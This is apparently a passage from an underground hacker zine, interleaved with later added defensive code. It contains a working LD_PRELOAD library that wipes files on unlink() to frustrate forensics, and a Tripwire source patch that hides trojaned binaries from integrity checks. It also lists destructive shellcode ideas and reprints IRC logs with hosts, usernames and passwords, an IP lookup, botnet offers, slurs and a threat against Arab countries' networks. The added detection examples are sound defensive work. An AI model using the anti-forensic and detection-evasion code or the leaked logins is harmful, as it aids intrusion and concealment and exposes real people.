 * Apparently honeynet has new ideas of how to steal your warez!
 * They're more sophisticated than ever!
 * Not just to be confined to HD MOORE sitting alone in a room, reading
 * full tcpdump logs (like shimomura) and piecing together the exploits into
 * his elite perl scripts for metadata.
 *
 * Now, the strategy is to let lamers compile exploits on owned boxes, and
 * copy them over into safe storage when unlink() is called.... for example,
 * temporary gcc assembly and preprocessor files will be backed up, leaving
 * your original code for lance spitzner to sed /s/.. your name out of the
 * headers, replace your name with his, sell it to iDEFENSE, and hail it as
 * another victory for project honeynet.
 *
 * No more! Compile this and LD_PRELOAD or LD_LIBRARY_PATH it before whatever
 * you do. Yea I know this code is lame, but if it prevents 0day from getting
 * lost then it was probably worth the 5 minutes.
 *
 * gcc -Wall -fpic -c pre_unlink.c
 * ld -Bshareable -o pre_unlink.so pre_unlink.o
 * and change "LIBC_PATH" to the path of libc on your system
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>     /* memset() */
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>   /* struct stat, stat() */
#include <dlfcn.h>
#include <errno.h>


#define DEBUG   1
#define LIBC_PATH       "/usr/lib/libc.so.12"
#define RANDOM_PATH     "/dev/urandom"
#define BLOCK_SIZE      4096


int (*xunlink) (const char *);
int unlink (const char *path);
void get_random_data (int fd, unsigned int len);


/* uh oh this function doesn't comply with the 52 pass secure dod wipe, so i'm sure
   michael zalewski or dvdman will publish an advisory soon but who karez cuz
   everybody knowz electron micr0sk0pez r used 4 microbiology not forensix */

void
get_random_data (int fd, unsigned int len)
{
        static int is_open = 0;
        static int randfd;
        char buf[BLOCK_SIZE];

        if (!is_open)
        {
                randfd = open (RANDOM_PATH, O_RDONLY);

                if (randfd < 0)
                {
                        perror ("open");
                        fprintf (stderr, "Error opening random data file: %s\n", RANDOM_PATH);
                        exit (EXIT_FAILURE);
                }

                is_open = 1;
        }

        memset (buf, 0x41, sizeof (buf));

        if (read (randfd, buf, len) != len)
        {
                perror ("read");
                fprintf (stderr, "Error fetching random data!\n");
                exit (EXIT_FAILURE);
        }

        if (write (fd, buf, len) != len)
        {
                perror ("write");
                fprintf (stderr, "Error writing random data!\n");
                exit (EXIT_FAILURE);
        }

        return;
}



int
unlink (const char *path)
{
        struct stat sb;
        int fd, result;
        unsigned int i;

#ifdef DEBUG
        fprintf (stderr, "unlink(%s) ...\n", path);
#endif

        if (stat (path, &sb) < 0)
        {
                perror ("stat");
                fprintf (stderr, "unlink() on %s: unable to stat this file.\n", path);

                if (errno == ENOENT)
                        goto do_unlink;

                exit (EXIT_FAILURE);
        }

        if ((fd = open (path, O_RDWR)) < 0)
        {
                perror ("open");
                fprintf (stderr, "unlink() on %s: unable to open this file for writing.\n",
                        path);

                if (errno == ENOENT)
                        goto do_unlink;

                exit (EXIT_FAILURE);
        }

        for (i = 0; i < sb.st_size; )
        {
                unsigned int to_write;


                /* wowow optimized! tanenbaum would be proud! */
                if ((sb.st_size - i) >= BLOCK_SIZE)
                        to_write = BLOCK_SIZE;
                else
                        to_write = (sb.st_size - i);

                get_random_data (fd, to_write);
                i += to_write;
        }

        close (fd);
do_unlink:
        result = xunlink (path);
        return result;
}


void
_init ()
{
        void *handle;

        handle = dlopen (LIBC_PATH, RTLD_LAZY);

        if (handle == NULL)
        {
                fprintf (stderr, "Error preloading library: %s\n", dlerror ());
                exit (EXIT_FAILURE);
        }

        if ((xunlink = dlsym (handle, "unlink")) == NULL)
        {
                fprintf (stderr, "Error hijacking unlink(): %s\n", dlerror ());
                exit (EXIT_FAILURE);
        }

        return;
}
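The wrapper above takes effect only because the dynamic loader reads LD_PRELOAD or LD_LIBRARY_PATH from the process environment before it resolves libc's unlink(); those same variables are what an investigator looks for in a suspect process. The following is an added example, not part of the original article: it parses a /proc/<pid>/environ-style block (NUL-separated KEY=value entries) and reports loader-control variables, with a helper that reads the live file for a pid. The two sample blocks and the /tmp/pre_unlink.so path in them are constructed for the demo.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Environment variables that change which object satisfies a libc symbol
 * such as unlink(); the two named in the article's header comment. */
static const char *const loader_vars[] = { "LD_PRELOAD=", "LD_LIBRARY_PATH=" };

/* Scan a /proc/<pid>/environ-style block: NUL-separated "KEY=value" entries,
 * `len` bytes in total. The first matching entry is copied into `out`
 * (if outlen > 0). Returns the number of loader-control variables found. */
int scan_environ(const char *env, size_t len, char *out, size_t outlen) {
    int hits = 0;
    size_t pos = 0;

    if (outlen > 0)
        out[0] = '\0';

    while (pos < len) {
        const char *entry = env + pos;
        const char *nul = memchr(entry, '\0', len - pos);
        size_t elen = nul ? (size_t)(nul - entry) : len - pos;
        size_t k;

        for (k = 0; k < sizeof loader_vars / sizeof loader_vars[0]; k++) {
            size_t plen = strlen(loader_vars[k]);
            if (elen >= plen && memcmp(entry, loader_vars[k], plen) == 0) {
                if (hits == 0 && outlen > 0)
                    snprintf(out, outlen, "%.*s", (int)elen, entry);
                hits++;
            }
        }
        pos += elen + 1;   /* skip the entry and its NUL separator */
    }
    return hits;
}

/* Read the live environment of one pid. Returns hits, or -1 if the
 * /proc file cannot be opened (wrong permissions, no such pid). */
int scan_pid(long pid, char *out, size_t outlen) {
    char path[64], buf[65536];
    FILE *fp;
    size_t len;

    snprintf(path, sizeof path, "/proc/%ld/environ", pid);
    fp = fopen(path, "rb");
    if (!fp)
        return -1;
    len = fread(buf, 1, sizeof buf, fp);
    fclose(fp);
    return scan_environ(buf, len, out, outlen);
}

/* Constructed samples: a shell carrying a preload library, and a clean one. */
static const char sample_hooked[] =
    "PATH=/usr/bin:/bin\0LD_PRELOAD=/tmp/pre_unlink.so\0HOME=/root\0";
static const char sample_clean[] =
    "PATH=/usr/bin:/bin\0HOME=/root\0TERM=xterm\0";

/* Demo helpers returning values a test can check. */
int demo_hooked_hits(void) {
    char first[256];
    return scan_environ(sample_hooked, sizeof sample_hooked - 1, first, sizeof first);
}

int demo_hooked_entry_is_preload(void) {
    char first[256];
    scan_environ(sample_hooked, sizeof sample_hooked - 1, first, sizeof first);
    return strcmp(first, "LD_PRELOAD=/tmp/pre_unlink.so") == 0;
}

int demo_clean_hits(void) {
    char first[256];
    return scan_environ(sample_clean, sizeof sample_clean - 1, first, sizeof first);
}

int main(void) {
    char first[256];
    int hits = scan_pid(1, first, sizeof first);   /* pid 1 as a live sanity check */
    printf("constructed hooked sample: %d hit(s), preload entry found: %d\n",
           demo_hooked_hits(), demo_hooked_entry_is_preload());
    printf("constructed clean sample:  %d hit(s)\n", demo_clean_hits());
    if (hits >= 0)
        printf("pid 1: %d loader-control variable(s)%s%s\n",
               hits, hits ? ", first: " : "", hits ? first : "");
    return 0;
}
```

The environment is only one place a wrapper like this can come from: a library listed in /etc/ld.so.preload is loaded without any variable being set, so this check complements, rather than replaces, comparing the address a process resolves for unlink() against the symbol in libc's own copy.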




|=[ 0x06 ]=--------------------------------------------------------------=|

Tripwire is Silly
by The Blackhat Moriaty

Over recent years we have seen admins faced with a deluge of rootkits, such
as the infamous Linux Root Kit. This ingeniously and originally named tool
replaces system binaries such as netstat, ls, ps and top! When an admin searches
for haxor files or unauthorized network connections he sees only what the
hacker wants him to see..... everywhere admins are in fear and confusion.
Until one day, out of the flames and panic comes... Tripwire, inc! With
their flashy new HIDS (yes guys, Host-based Intrusion Detection System) they
promised to save the world from modified files. A lot of time and effort
went into making tripwire secure. You need not one, but two passwords to
modify tripwire's database, as it itself is heavily encrypted to prevent
tampering.

In response to this, infamous hackers such as Optyx of team Uberh4x0r
created a series of steadily worsening kernel-based rootkits such as KIS
(Keep It Superfluous). Now, unfortunately, the days of kernel-based rootkits
are long gone. Although a lot of hackers haven't quite caught up with this
fact yet, RedHat (*the* #1 Linux purveyor) now ship a kernel that doesn't
export the symbol for sys_call_table! Oh gno! Once again, it looks as if
Tripwire, Inc has found its niche in the information security paradigm.
Without kernel level support how are we ever gonna be able to keep a trojan
on a box! (At the moment maybe some people are sitting there saying "What,
do you mean it's not OK just to match the size/timestamp?", and I urge these
people to just put the keyboard down and walk away.)

Well, I have spent many hours searching the source code of tripwire
looking for tricks to get around this big problem. Tripwire, Inc, have taken
a lot of time to make their source code hard to audit, and the infamous
Object Orientated Bloatware approach has been used to make any audit as
unpleasant as possible.

However, after several hours work I came up with the following solution:
Just replace the Compare method in src/fco/fcocompare.cpp with the one below!
It's a pretty small file, and anyway patch is hard. You know you're probably
better off sticking to cut 'n' paste in notepad!

Just add new elements to the hidden array for every file you don't want
tripwire to check! Just do a 'make release' and copy the tripwire binary over
the top of the old one - remember to strip the binary and to match size and
timestamp!@

---[CUT HERE YOU MORON]--------------------------------%<--------------------------------------------------

///////////////////////////////////////////////////////////////////////////////
// Compare 
///////////////////////////////////////////////////////////////////////////////
uint32 cFCOCompare::Compare(const iFCO* pFco1, const iFCO* pFco2) 
{
	int i= 0;
	// paths that are always reported EQUAL, whatever their properties say
	const char *hidden[] = {
				"/usr/sbin/sshd",
				"/usr/sbin/tripwire",
				0};

	ASSERT(pFco1 != 0);
	ASSERT(pFco2 != 0);
	// first, make sure the fcos are of the same type...
	if(pFco1->GetType() != pFco2->GetType())
	{
		ASSERT( false );
		INTERNAL_ERROR( "fcocompare.cpp" );
	}

	/* hohoho letz be kradicle */
	while(hidden[i])
	{
		if(strcmp(pFco1->GetName().AsString().c_str(), hidden[i]) == 0)
		{
			return EQUAL;
		}
		i++;	/* without this the loop never gets past the first entry */
	}
	
	const iFCOPropSet* ps1		= pFco1->GetPropSet();
	const iFCOPropSet* ps2		= pFco2->GetPropSet();
	const cFCOPropVector& v1	= pFco1->GetPropSet()->GetValidVector();
	const cFCOPropVector& v2	= pFco2->GetPropSet()->GetValidVector();

	uint32 result = 0;

	mInvalidProps.SetSize( v1.GetSize() );
	mUnequalProps.SetSize( v1.GetSize() );
	mInvalidProps.Clear();
	mUnequalProps.Clear();

	// finally, compare all the properties
	for(int i=0; i<v1.GetSize(); i++)
	{
		if(mPropsToCmp.ContainsItem(i))
		{
			if((! v1.ContainsItem(i)) || (! v2.ContainsItem(i)))
			{
				mInvalidProps.AddItem(i);
				result |= PROPS_NOT_ALL_VALID;
			}
			else
			{
				// compare the properties
				if(ps1->GetPropAt(i)->Compare(ps2->GetPropAt(i), iFCOProp::OP_EQ) != iFCOProp::CMP_TRUE)
				{
					// they are not equal!
					mUnequalProps.AddItem(i);
					result |= PROPS_UNEQUAL;
				}
			}
		}
	}

	if( ! result )
		result = EQUAL;

	return result;
}

---[STOP CUTTING HERE YOU MORON]----------------------------%<----------------------------------------------
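The "just match the size/timestamp" remark above, shown the other way round as an added example (mine, not from the article or from Tripwire): two files are made identical in size and mtime but different in content, a size/mtime comparison calls them EQUAL, and a content hash against a baseline does not, which is why the checker binary itself needs a hash kept off the host. The stand-in file name, its contents and the baseline layout are constructed.

```python
"""Size/timestamp matching versus a content hash (added example, not from the
article or from Tripwire). The stand-in file, its contents and the baseline
format are constructed for the demo."""
import hashlib
import os
import tempfile


def file_digest(path: str) -> str:
    """SHA-256 of the file contents, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def take_baseline(path: str) -> dict:
    """What a checker should record: metadata and a content hash. The baseline
    belongs off the host (read-only media), not next to the binary it guards."""
    st = os.stat(path)
    return {"size": st.st_size, "mtime_ns": st.st_mtime_ns,
            "sha256": file_digest(path)}


def metadata_only_compare(path: str, baseline: dict) -> bool:
    """The check the article mocks: size and timestamp only."""
    st = os.stat(path)
    return (st.st_size == baseline["size"]
            and st.st_mtime_ns == baseline["mtime_ns"])


def hashed_compare(path: str, baseline: dict) -> bool:
    """Metadata plus content; the hash cannot be satisfied by padding and utime."""
    return (metadata_only_compare(path, baseline)
            and file_digest(path) == baseline["sha256"])


def swap_keeping_size_and_mtime(path: str, new_content: bytes) -> None:
    """Constructed stand-in for the swap the article describes: different bytes
    padded to the old size, then the old mtime put back. (The inode ctime still
    moves; userland cannot reset it, which is why checkers record it too.)"""
    st = os.stat(path)
    if len(new_content) > st.st_size:
        raise ValueError("replacement is larger than the original")
    with open(path, "wb") as f:
        f.write(new_content.ljust(st.st_size, b"\0"))
    os.utime(path, ns=(st.st_atime_ns, st.st_mtime_ns))


def demo() -> dict:
    """Baseline a file, swap it in place, and return both verdicts."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "tripwire")    # constructed stand-in for the HIDS binary
        with open(target, "wb") as f:
            f.write(b"ORIGINAL-CHECKER" + b"\0" * 1000)
        baseline = take_baseline(target)
        swap_keeping_size_and_mtime(target, b"PATCHED-CHECKER")
        return {"metadata_only_says_unchanged": metadata_only_compare(target, baseline),
                "hash_says_unchanged": hashed_compare(target, baseline)}


if __name__ == "__main__":
    print(demo())
```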




|=[ 0x07 ]=--------------------------------------------------------------=|

Evil Shellcodes
by The Blackhat Moriaty

Here is a nice little archive of ready-to-use Linux shellkodez 4 your 
perusal. All have been filtered for bad chars and tested in the wild!


/*
 * Opens /dev/audio, reads bytes from /dev/random and
 * while they are non-null, writes them to /dev/audio.
 *
 * Note: We tested this one on Al Huger. We embedded this inside a gay
 * porn mpg, which exploited a local vulnerability in xine. Al thought he
 * was gonna watch Frisky Summer II, but imagine his surprise when this
 * garbage was heard thru his speakerz instead!
 */

/*
 * Chmods /sbin/init non-executable and then writes
 * "logout" to the end of the root user's login
 * file.
 *
 * Note: This idea was borrowed from the infamous seiki ownage log. So,
 * I guess not terribly original but still a classic in its own right.
 */

/*
 * As used in the infamous cryptome.org defacement,
 * writes "It was bighawk!" to the index.html
 */


/* 
 * Copies /etc/shadow over the top of /etc/issue
 *
 * Note: Pure fun... this never gets old
 */

/*
 * Removes jobe's entries from /etc/[passwd/shadow]
 * then rm's /home/jobe
 */

/*
 * Reads a single byte from /dev/random, if it's
 * 0x0 then rm's /
 *
 * Note: The shellcode version of phrack.efnet.ru's own
 * hacker russian roulette.
 */





|=[ 0x08 ]=--------------------------------------------------------------=|

Really Dangerous Cisco Shit Released
by FX

if the w0rld g4sped w/ anticipation when the legendary dvdman made a subtle
r3f3r3nc3 2 hiz c1sq0 rem0te shell penetration t00l on irc, and the logz were
published 4 all, that wuz nothing compared to the widespr34d p4n1c th@
f0llowed phen0elitz new shit. apparently, there iz a 2 GB s1gned 1nteger
0verflow in cisc0 routerz!!!!!!

let'z view the approximate timeline 4 phen0elitz development of this expl0it:
Jan 5.	3PM	finish reading thru ios 11.3 src code 4 the day
	4PM	contact the 15 person phen0elit art team
	4.5PM	fritzie calls back with a great idea for an 'exploit name'
	4.6PM	holgar iz w0rking on the ascii banner, wilhelm is making the
		t-shirt
Jan 6.  10AM	prepare to see if the vulnerability is exploitable, write POC
	11AM	start sending 2gb of data to the r0uter on the lokal NET
	8PM	end of specially crafted data arrives @ r0uter
Jan 7-	11AM	start sending daily 2 gb
Feb 25	8PM	0h b0y 0 b0y! my r0uter finally cr4shed 2day! l3mm3 r3ad l0gz
Feb 26	8PM	1t w0rked! n0w 1 n33d 2 sk4n th3 n3t & f1nd an0ther r0uter
		s0mewhere runn1ng the exact same i0s vers10n 0n the s4me
		ch1ps3t, w1th the same number of open s0cketz, & with the
		exact same dev1c3z
Mar 8	2PM	g0t it!
Mar 8	3PM	try rem0te exploit!
Jul 20	5AM	w0w! my wh0le packet finally arrived, 1t w0rkd! n0w letz have
		fun w/ th1z k0rean r0uter until the adm1n getz b4ck fr0m
		falun g0ng & findz h1z c0nf1g is m1ss1ng
Jul 20	7AM	sent advis0ry out 2 dave ahmad




|=[ 0x09 ]=--------------------------------------------------------------=|

The Defcon Review
by phr4k st4ff

s0, this yearz defcon really suqd, even m0re than all the onez in recent
mem0ry. well, it could have been worse, phrack staff could have been stranded
at s0me place like CCC, with a bunch of y0deling european haqr fagg0tz with
roq-climbing bakpakz & bootz & green sh0rtz & suspenderz listen1ng 2 dav1d
hasselh0ff tapez while stealth talkz about the new pr0cfs function he f0und
and hendy playz w1th h1z sh0elaces.... 

so what did u miss if u werent @ defc0n?
h0pefully a lizt will b eazier than thiz dial0gue f0rm@:

o crispin c0wan
	o haz a phd
	o teachez a few intro 2 os coursez @ oregon inst. of tech or smtg.
		o also writes "secure" software
		o agreed that he "fucked up" when his immunix stackguard
		  th1nk t4nk decided 2 plaze the c4n4ry 0n the st4q
		  betw33n the fr4me p0inter & the st4ck p0inter
	o wuz @ defk0n hakn it up with hiz companyz ctf team
	o stayed in vegas for a week, but didnt stop playing ctf
		o somehow, 20 d00dz from immunix got paid 2 go 2 vegas 2
		  play ctf??
		o immunix l0st ctf

o kev1n m1tnick
	o the c0nd0r wuz wandering ar0und defk0n like an austistic kid 
	  inside the myst3ry fun h0uze
	o tr1ed tlaking 2 him but apparently he wuznt 2 happy cuz we w3r3
	  th3 0nly ppl th3r3 th@ werent try1ng 2 kizz h1z azz
	o rej3kted 0ur 0fferz 2 g1ve h1m the upd8d k0py 0f jsz's m41lsp00lz

o w1nn schw4rt4u
	o st1ll f@ & bl04t3d
	o s0me n4sty 4ss ch1x d01ng h4qr je0pardy
	o 4sk3d s0me krazy tekn1k4l quest10nz l1ke
	  "what does the n0p instrukt10n d0 in ass3mbly?" &
	  thus b4ffl3d the kr0wd

o l4nce sp1tzc0q
	o n0t really sure 4b0ut th1z 0n3
	o l3ft 4ft3r day1 becuz 0f 4ll the h4rr4ssm3nt... h4h4h4h!

o n30nfr30n
	o we h4d n0 idea wh0 th1z guy wuz unt1l s0meb0dy sh0uted:
	  "hey rnt u ne0nfre0n fr0m und3rn3t?!?!?!?!"

o p4ck3t f41ry
	o the highl1te 0f every defk0n, wuz h3r3 th1z year 2!
	o th1z y34r wearing leather ch4pz 0ver kut0ff st0new4sh3d j34nz

o h4ck3r d14r13z
	o sp0ttd 2 memberz 0f th1s l3g3nd4ry s4g4
	o hd m00re, beam1ng 4ft3r h1s r1pp3d xf0cus dc0m rel34s3
	o s4w 4nn4 m00r3 (4k4 st4rl4 pur3h34rt), th0ught sh3 w4z a d00d @1st

o h4x0r g1rlz
	o p0rn0graph1c f1lmz w1th g1rlz simultane0uzly str1ppn/us1ng nmap
	o def1n1tely the 0nly t1me ull hear 'fy0d0r' and 'pussy' in the same
	  p4r4gr4ph
	o th3z3 g1rlz were 2 nause4t1ngly disgust1ng 2 fuq, & bes1d3z we
	  r4n 0ut 0f 0ur preskr1pt0n 4 v4ltr3x, s0 the 0nly pers0n br4v3
	  en0ugh 2 get a p4rty f4v0r 0ut 0f the d34l wuz tr4shk4n m4n

DISCLAIMER: 1m n0t sure h0w funny th1z wuz, pr0bably n0t @ all becuz th3r3
really wuz n0th1ng 2 rep0rt. DC 12 sh0uld be a l0t m0re fun, j01n us th3r3
w3r3 g0nna k0mm1t mass su1c1de!




|=[ 0x0a ]=--------------------------------------------------------------=|

A Pr0ix IRC Medley
by the b1g leb0wsk1


EDITOR'S NOTE: We continued this exhilarating piece here, at the end of
Linenoise just because of its sheer immense volume. This piece was also
submitted much later by the author, who had to actually create a
specialized log cutting program that made use of the Boyer-Moore fast string
searching algorithm, to find the most interesting snippets from gigabytes
of pr0ix irc logs.


Ever wanted access to hack.co.za ?

[26 Aug/05:42am] (pr0ix) i have a static ip where im coming from
[26 Aug/05:43am] <cami> ok
[26 Aug/05:43am] (pr0ix) 195.254.225.135 source
[26 Aug/05:43am] <cami> host: hack.co.za
[26 Aug/05:43am] <cami> user: m0rkus
[26 Aug/05:43am] <cami> pass: d0rkus
[26 Aug/05:44am] (pr0ix) k

/*************************************************/

Or @ on #darknet ?

[10 Aug/12:28pm] -Mengele- Congradulations pr0ix!
[10 Aug/12:28pm] -Mengele- dvdman has given you Ops with flags o on #darknet.
[10 Aug/12:28pm] -Mengele- Please set a password: /msg Mengele pass <password>
[10 Aug/12:28pm] -Mengele- where <password> is your selected password.
[10 Aug/12:28pm] -Mengele- You can get ops by: /msg Mengele op <password>
[11 Aug/01:24am] (pr0ix) pass fuckm3h4rd!
[11 Aug/01:24am] -Mengele- Password set to: 'fuckm3h4rd!'.
[20 Aug/01:58am] -Mengele- Your flags have been upgraded to o on #darknet.

/*************************************************/

Me me me me me !!!!

[6 Aug/01:59am] @ Topic by pr0ix: if anyone is interested to make a botnet /msg pr0ix

/*************************************************/

And so do we!!!

[2 Sep/02:45am] (pr0ix) i have enough log's from different places to get you busted
[2 Sep/02:46am] <sistom> umm....

/*************************************************/

Anyone want CANVAS?, thanx dvdman !!

[11 Aug/02:40am] <dvdman> http://codes.dvdman.ws/warez/CANVAS
[11 Aug/02:41am] (pr0ix) whats that?
[11 Aug/02:42am] <dvdman> david aidels canvas
[11 Aug/02:42am] <dvdman> its a exploit thingy

/*************************************************/

It's one of life's mysteries!

[22 Aug/02:23am] (pr0ix) btw how the fuck can i sniff ftp passwords with tcpdump?

[22 Aug/02:46am] (pr0ix) explain me howto sniff with tcpdump
[22 Aug/02:47am] <c0n> tcpdump -lnettts 1600 -Xw tcpdump.out & tail -f tcpdump.out
[22 Aug/02:47am] <c0n> hmm
[22 Aug/02:47am] <c0n> that should work

/*************************************************/

Chiqz fuck for shellcode ?!?!

[5 Sep/08:19am] <sorbo> damn they didn't post zacode.c .. prolly banner was too lame even though the 21b shellcode worked.... eheheh
 ill prolly not b able to eat her pussyt now 
[5 Sep/08:19am] (pr0ix) why do you care?
[5 Sep/08:20am] (pr0ix) who is that chick?
[5 Sep/08:20am] <sorbo> cuz she was willing to fuck me =P
[5 Sep/08:20am] <sorbo> eheheh she's not even that hot actually

/*************************************************/

Someone send pr0ix a copy of "Shell scripting for dummies"

[4 Aug/03:03am] (pr0ix) hmm listen, i have a small problem where you can help me
[4 Aug/03:03am] <rxtx> sup?
[4 Aug/03:03am] (pr0ix) i have some files in a directory like 20030701_syslog.log 20030702_syslog.log etc etc
[4 Aug/03:03am] <rxtx> yeah
[4 Aug/03:03am] (pr0ix) i want to cat every single file and grep -i for DISCONNECT and write it do date.log
[4 Aug/03:04am] (pr0ix) i mean: cat 20030701_syslog.log|grep -r DISCONNECT >20030701.logs
[4 Aug/03:04am] (pr0ix) how to automate this?
[4 Aug/03:04am] (pr0ix) cat 20030702_syslog.log|grep -r DISCONNECT >20030702.logs
[4 Aug/03:04am] (pr0ix) etc etc

/*************************************************/

Yes, that truly would be the best. It sounds very feasible too!

[8 Sep/03:12am] <moph_> what kind of trojan do you need?
[8 Sep/03:12am] (pr0ix) ssh
[8 Sep/03:12am] (pr0ix) best would be all in one SSH/INETD/APACHE+sniffer
[8 Sep/03:13am] (pr0ix) even a rootkit would do the job, it has to be private, everything else gets detected

/*************************************************/

You've only just realised ??

[4 Aug/02:53pm] (pr0ix) wait wait :P
[4 Aug/02:54pm] (pr0ix) i have 0 clue..

/*************************************************/

Don't we?

[7 Aug/09:07am] (pr0ix) 1] you don't even know from what fucking place on the earth i come from
[7 Aug/09:07am] (pr0ix) 2] you have zero clue what networks i admin
[7 Aug/09:07am] (pr0ix) 3] you dont know what and where i work

/*************************************************/

Opers abusing their status? tututut

[8 Sep/07:32am] (pr0ix) do me a favour /stat jaf
[8 Sep/07:33am] <netmunky> /stat l?
[8 Sep/07:33am] (pr0ix) yeah
[8 Sep/07:33am] (pr0ix) no even
[8 Sep/07:33am] (pr0ix) just /stat jaf
[8 Sep/07:34am] <netmunky> /stat is an ambiguous command, /stats jaf shows nothing
[8 Sep/07:34am] <netmunky> /stats l gives ... irc.choopa.net jaf[~jaf@phrack.com.br] 0 2740 160 1707 54 :31847 3 -
[8 Sep/07:34am] (pr0ix) hmm
[8 Sep/07:34am] (pr0ix) you are global O ?
[8 Sep/07:34am] <netmunky> yup
[8 Sep/07:38am] (pr0ix) ok we found it
[8 Sep/07:38am] (pr0ix) [blane(blane@oper.efnet.demon.co.uk)] unknown@193.99.135.162 is not valid for the account specified
[8 Sep/07:38am] (pr0ix) thx anyways
[8 Sep/07:38am] (pr0ix) found the real ip
[8 Sep/07:39am] (pr0ix) fuck that is blane's work ip
[8 Sep/07:42am] <netmunky> the ip isn't 140.164.30.200?
[8 Sep/07:43am] (pr0ix) no
[8 Sep/07:43am] (pr0ix) do: /dns 140.164.30.200
[8 Sep/07:43am] <netmunky> try asking someone on choopa?
[8 Sep/07:43am] (pr0ix) everyone idle
[8 Sep/07:44am] <netmunky> ... irc.choopa.net jaf[~jaf@198.169.185.135] 0 2848 167 1754 55 :32461 8 -
[8 Sep/07:44am] <netmunky> /stats L jaf
[8 Sep/07:44am] (pr0ix) great thank you
[8 Sep/07:44am] (pr0ix) great great
[8 Sep/10:13am] (pr0ix) hmm can you /stat jaf again?
[8 Sep/10:15am] <netmunky> ... irc.secsup.org jaf[~jaf@198.169.185.135] 0 382 26 162 4 :2534 0 -

/*************************************************/

Thanks !

[20 Aug/10:57am] (pr0ix) ssh reptile.cube11.net -p 2222 -l lsd
[20 Aug/10:57am] (pr0ix) pass ist try2fix!
[20 Aug/11:48am] (pr0ix) reptile.cube11.net 2222 panther/!changeme

/*************************************************/

pr0ix aka z3r0c00l !!

[5 Sep/03:16am] <cami> dood.. you have no idea what you are talking about.. your technical knowledge is VERY limited..
[26 Aug/10:10am] (pr0ix) ja fuck with the bes, die like the rest

/*************************************************/

pr0ix repeating...


[4 Sep/08:07am] <phooxir1> well, nothing really.. playing with linux kernel 2.6
[4 Sep/08:07am] <phooxir1> hooking systemcalls through dma
[4 Sep/08:07am] <phooxir1> quite nice 
[4 Sep/08:07am] (pr0ix) interesting.. got some new warez?

[4 Sep/08:07am] (pr0ix) greets
[4 Sep/08:08am] (pr0ix) listen is it possible to hook systemcalls trough dma?
[4 Sep/08:11am] <kokanin> i have absolutely no idea whatsoever :)

/* Lol, it doesn't stop there ! Does anyone actually think pr0ix even knows what an off by one is? */

[4 Sep/08:09am] (pr0ix) rumours about a OpenBSD ftpd off by one are going around
[4 Sep/08:10am] <phooxir1> heared that, they said the bug is in the MKDIR routine, I went through it, no offbyone bug there, no noth
ing.

[5 Sep/02:57am] (pr0ix) hmm
[5 Sep/02:58am] (pr0ix) heared that, they said the bug is in the MKDIR routine, I went through it, no offbyone bug there, no nothing
[5 Sep/02:58am] (pr0ix) maybe you found something else
[5 Sep/02:58am] <sorbo> realpath
[5 Sep/02:58am] (pr0ix) sftp or ftpd?


/*************************************************/

pr0ix gets tough!..

[11 Aug/01:43am] (pr0ix) i dont even know "mrdivide" i dont like kidz at all
[11 Aug/01:44am] <nrm1> mrdivide owns the botnet that is currently controling #darknet
[11 Aug/01:44am] <nrm1> im not a kid
[11 Aug/01:44am] (pr0ix) watch your mouth if you want to stay and dont fuck with people you don't know.


[8 Sep/07:48am] (pr0ix) listen, just a advice from me, stop playing with CNR's reverse Zone's
[8 Sep/07:48am] (pr0ix) just a advice
[8 Sep/07:48am] <jaf> what is CNR's ?
[8 Sep/07:48am] (pr0ix) you know what i mean


[8 Sep/08:01am] (pr0ix) you little fag, what makes you think i own that box?
[8 Sep/08:01am] (pr0ix) and i think the biggest kid are you
[8 Sep/08:02am] <jaf> nah
[8 Sep/08:02am] <jaf> im l33t, you not


[26 Aug/03:12am] <ech0> its childish
[26 Aug/03:12am] (pr0ix) you can feel lucky, belive me he's able to take out your whole ISP's backbone..
[26 Aug/03:12am] (pr0ix) yeah why not, i could kill your isp

[26 Aug/03:07am] (pr0ix) you are a clueless fag
[26 Aug/03:07am] (pr0ix) you keep fucking with my friends
[26 Aug/03:07am] <ech0> how so ?
[26 Aug/03:07am] (pr0ix) i dont want you in #darknet so fuck off

/*************************************************/

pr0ix starts his own pr0j3ct m4yh3m

[31 Aug/11:46am] (pr0ix) yeah, heh i started a new project, "no justice - no peace - kill arabs"
[31 Aug/11:50am] (pr0ix) soon i will be able to toggle the internet in every arab country, sounds strange and gay but its true
[31 Aug/11:53am] <ofer> I hope so :)
[31 Aug/11:57am] (pr0ix) no shit, it will even affect the big oil companies

/*************************************************/

ROFL

[7 Aug/09:02am] <illumz> who knows maybe u did get haxed
[7 Aug/09:03am] (pr0ix) haha never

/*************************************************/

At least pr0ix laughs at his own lameness

[8 Sep/08:22am] <[RaFa]> many people told me your skilled
[8 Sep/08:22am] (pr0ix) *lol*

/*************************************************/

I wonder what goodies are on dvdman's home box?

[22 Aug/02:25am] <dvdman> ssh 208.59.134.110
[22 Aug/02:25am] <dvdman> login = pr0ix
[22 Aug/02:25am] <dvdman> pw = temp

/*************************************************/




|=[ 0x0b ]=--------------------------------------------------------------=|

Project Honeynet Enumeration
by anonymous Phrack High Council Member

Well we all know about the HoneyNet project. (www.honeynet.org for l4merz) 
They catch hackers by luring you in with the appearance of exploitability,
record all your traffic with Snort and Sebek (their vlogger ripoff), then
steal all your 0day, and abuse it for creepy whitehat purposes. Like, say,
publishing the code on bugtraq. Or having Lance pretend to understand it.
Or put it in the hands of any other narc/spook in the business of selling
out their souls.

Do not despair kiddies! The tables are turning. PHC Enterprises, LTD, a
subsidiary of Phrack Magazine Corp., has developed a highly efficient,
multithreaded, self-replicating, highly aggressive packet scanner capable
of identifying honeypots in the wild.

Enter HONEYSCAN.C!!@@#$%^
HONEYSCAN: "Stickier than rloxely's keyboarD!"
HONEYSCAN: "More tricks than a vegas hooker!"
HONEYSCAN: "Smokes the crack!"

The advanced crack-smoking techniques used in this scanner will not be
disclosed at the present time, at the request of PHC Labs/Research division.
Testing is ongoing. However, if honeypots or honeynets are ever deployed...
AHEM, uhh anywhere at all really, you can rest assured that PHC Enterprises
will alert YOU, the PHRACK consumer, of the presence of honeypots on the
Internet. As a token of our gratitude for your continued patronage of the
true underground scene, we would like to present a list of honeypots, for
recreational packeting purposes.

 
DRUMROLL, PLEASE

RECREATIONALLY PACKET THESE BOXES!@#$%
RLOXLEY THIS MEANS YOU.





